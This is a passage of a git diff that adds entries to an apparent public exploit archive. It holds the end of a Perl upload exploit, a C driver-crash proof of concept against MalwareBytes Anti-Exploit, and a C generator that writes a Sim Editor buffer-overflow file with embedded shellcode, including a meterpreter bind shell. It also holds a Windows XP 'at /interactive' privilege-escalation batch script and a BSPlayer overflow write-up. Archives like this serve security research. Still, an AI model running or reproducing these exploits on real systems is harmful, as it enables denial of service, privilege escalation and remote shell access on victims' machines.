+	];
+my $res = $ua->request($req);
+$between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12);
+print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between);
+exit;
diff --git a/platforms/windows/dos/35842.c b/platforms/windows/dos/35842.c
new file mode 100755
index 000000000..ed9dd31f2
--- /dev/null
+++ b/platforms/windows/dos/35842.c
@@ -0,0 +1,71 @@
+/*
+
+Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
+Date             - 19th January 2015
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - https://www.malwarebytes.org
+Tested Version   - 1.03.1.1220, 1.04.1.1012
+Driver Version   - no version set - mbae.sys
+Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
+OSVDB            - http://www.osvdb.org/show/osvdb/114249
+CVE ID           - CVE-2014-100039
+Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
+Fixed version    - 1.05
+Fixed driver ver - no version set
+
+*/
+
+
+
+#include <stdio.h>
+#include <windows.h>
+
+#define BUFSIZE 25
+
+
+int main(int argc, char *argv[]) 
+{
+    HANDLE         hDevice;
+    char           devhandle[MAX_PATH];
+    DWORD          dwRetBytes = 0;
+    BYTE           sizebytes[4] = "\xff\xff\xff\x00";   
+    BYTE           *inbuffer;
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf("        MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS            \n");
+    printf("             Tested on Windows XP SP3/Windows 7 SP1 (32bit)                    \n");
+    printf("-------------------------------------------------------------------------------\n\n");
+
+    sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
+
+    inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+    memset(inbuffer, 0x41, BUFSIZE);
+    memcpy(inbuffer, sizebytes, sizeof(sizebytes));
+
+    printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if(hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("\n[-] Open %s device failed\n\n", devhandle);
+        return -1;
+    }
+    else 
+    {
+        printf("\n[+] Open %s device successful", devhandle);
+    }	
+
+    printf("\n[~] Press any key to DoS . . .");
+    getch();
+
+    DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
+
+    printf("\n[+] DoS buffer sent\n\n");
+ 
+    CloseHandle(hDevice);
+
+    return 0;
+}
\ No newline at end of file
diff --git a/platforms/windows/local/35821.txt b/platforms/windows/local/35821.txt
new file mode 100755
index 000000000..a07f3f8d1
--- /dev/null
+++ b/platforms/windows/local/35821.txt
@@ -0,0 +1,135 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define SIZE 65536  
+
+/*
+ * Title: Sim Editor v6.6 Stack Based Buffer Overflow
+ * Version: 6.6
+ * Tested on: Windows XP sp2 en, Windows 8 64-bit
+ * Date: 16-01-2015
+ * Author: Osanda Malith Jayathissa
+ * E-Mail: osanda[cat]unseen.is
+ * Website: OsandaMalith.wordpress.com
+ * CVE: CVE-2015-1171
+ */
+
+const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1" 
+        		"3231561503561583eefce2a496ab54" 
+        		"46672c07cf821d15abc70ca9b88abc"
+        		"42ec3e36263830ff8d1e7f00209ed3"
+        		"c222622e17855be16ac49c1c849475"
+        		"6a3709f22e8428d424b45251fa41e9"
+        		"582bf96612d3712082e25632feadd3"
+        		"81752c32d8761e7ab749ae77c98e09"
+        		"68bce46915c73f13c142ddb382f505"
+        		"454663ce4923e7884db224a36a3fcb"
+        		"63fb7be8a7a7d891fe0d8eaee0ea6f"
+        		"0b6b187b2d36777abf4d3e7cbf4d11"
+        		"158ec6fe620f0dbb9d450fea3500da"
+        		"ae5bb331ec6530b38d9128b688deee"
+        		"2be14f9b4b566f8e262bff50d1a58b"
+        		"92"; 
+
+/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
+const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
+		"4a83effc315f11035f11e2ca04054e"
+		"34f5d62fbd10e77dd9515ab2aa3457"
+		"39feacec4fd6c345e500ed56cb8ca1"
+		"954d70b8c9ad49731caf8e6eeffd47"
+		"e44212ecb85e99be2ce77e744cc6d0"
+		"0317c8d3c02341cc050f1b67fdfb9a"
+		"a1cc04ad8d823a0100db7ba6fbae77"
+		"d486a843a65c3d560016e5b2b0fb73"
+		"30beb0f01ea347d514dfccd8fa6996"
+		"fede324c9f479f23a098479b04d26a"
+		"c831b9e23d7342f3290431c1f6bedd"
+		"697e18198d55dcb570561c9fb6024c"
+		"b71f2b07479ffe87170f5167c8ef01"
+		"0f02e07e2f2d2a179e098670e2ad38"
+		"dd6b4b50cd3dc3cd2f1adc6a4f4970"
+		"22c7c69ef4e8d7b45644705f2d8645"
+		"7e3283ee17a5597e55575dab0f97cb"
+		"5786c06355ff272ca62a3ce532952b"
+		"0ad215ac5cb815c4389845f14635fa"
+		"aad2b5ab1f74dd5179b242a9ac42bf"
+		"7c89c0c90af908";
+
+const char *shells[] = { shell1, shell2 };
+const char *shell_names[] = { "MS Paint", "Bind Shell" };
+const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
+const size_t SHELLS_COUNT = 2;
+
+int menu() {
+    size_t shell_type = SHELLS_COUNT;
+    puts("\b[?] Choose an Option: ");
+    size_t i;
+    for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
+    scanf("%i", &shell_type);
+	return shell_type;
+}
+
+void banner() {
+    static const char banner[] =                                                                                                
+                " _____ _          _____   _ _ _           \n"
+                "|   __|_|_____   |   __|_| |_| |_ ___ ___ \n"
+                "|__   | |     |  |   __| . | |  _| . |  _|\n"
+                "|_____|_|_|_|_|  |_____|___|_|_| |___|_|\n"
+                "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
+                "[~] Author: Osanda Malith Jayathissa\n"
+                "[~] E-Mail: osanda[cat]unseen.is\n"
+                "[~] Website: OsandaMalith.wordpress.com\n\n";
+
+    fwrite(banner, sizeof(char), sizeof(banner) , stdout);
+}
+
+void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
+    size_t pattern_len = strlen(pattern);
+    count *= pattern_len;
+    if (count > dst_size) count = dst_size;
+    if (pattern_len > dst_size) pattern_len = dst_size;
+
+    size_t i, pI;
+    for (i = 0, pI = 0; i < count ; i++, pI++) {
+        if (pI == pattern_len) pI = 0;
+        dst[i] = pattern[pI];
+    }
+}
+
+int main() {
+    banner();
+    int shell_type = menu();
+    if (shell_type >= SHELLS_COUNT) {
+        printf("[-] Enter a valid input\n");
+        exit (1);
+    }
+
+    char *buff = (char*) calloc (SIZE, sizeof(char));
+    char *nops = (char*) calloc (SIZE, sizeof(char));
+    if (!buff || !nops) exit (1);
+
+    patternfill(buff, "41", 405, SIZE);
+    patternfill(nops, "90", 16, SIZE);
+
+    char ret[] = "B3804200";
+    const char* filename = "exploit.sms";
+
+    FILE *outfile = fopen(filename, "w");
+    if (!outfile) {
+        printf("%s\n","Could not open file");
+        exit (1);
+    }
+
+    fputs(buff,   outfile);
+    fputs(ret,    outfile);
+    fputs(nops,   outfile);
+
+    fputs(shells[shell_type],  outfile);
+    printf("%s", shell_info[shell_type]);
+    fclose(outfile);
+    free(buff);
+    printf("[+] Successfully to written to: \"%s\"\n", filename); 
+    return 0;
+}
+/*EOF*/
\ No newline at end of file
diff --git a/platforms/windows/local/35850.bat b/platforms/windows/local/35850.bat
new file mode 100755
index 000000000..6a130791d
--- /dev/null
+++ b/platforms/windows/local/35850.bat
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/48232/info
+
+Microsoft Windows is prone to a local privilege-escalation vulnerability.
+
+A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition. 
+
+@echo off
+echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
+start time /T > time.txt
+tskill explorer
+time 13:36:59 > nul
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+cls
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+cls
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+cls
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+
+
+echo [*] Backup time
+time < time.txt
+
diff --git a/platforms/windows/remote/35841.txt b/platforms/windows/remote/35841.txt
new file mode 100755
index 000000000..7ec1d54e7
--- /dev/null
+++ b/platforms/windows/remote/35841.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Bsplayer HTTP Response BOF
+# Date: Jan 17 ,2015
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Vendor Homepage: www.bsplayer.com
+# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
+# Version: current (2.68).
+# Tested on: Windows 7 sp1 x86 version.
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Youtube : https://www.youtube.com/user/cutehack3r
+
+Exploit: http://www.exploit-db.com/sploits/35841.tar.gz
+
+Bsplayer suffers from a buffer overflow vulnerability when processing the
+HTTP response when opening a URL. In order to exploit this bug I needed to
+load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed
+that one of the dlls that matches this criteria is (MSVCR71.dll) and it's
+loaded when I loaded an flv file over the network and that's why I'm
+sending a legitimate flv file first so later we can use the loaded dll.
+Also the space after the seh record is pretty small so what I did is that I
+added a small stage shell cdoe to add offset to esp so it points at the
+beginning of my buffer and then a jmp esp instruction to execute the actual
+shellcode.
+
+
+-- 
+
+*Regards,*
+
+Fady Osman
+about.me/Fady_Osman
+    <http://about.me/Fady_Osman>